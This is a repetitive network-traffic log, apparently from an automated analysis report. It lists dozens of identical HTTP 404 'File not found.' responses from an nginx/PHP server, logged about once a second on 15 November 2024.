Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:46 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:05 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:10 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:16 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:21 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:31 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:16:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:16:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
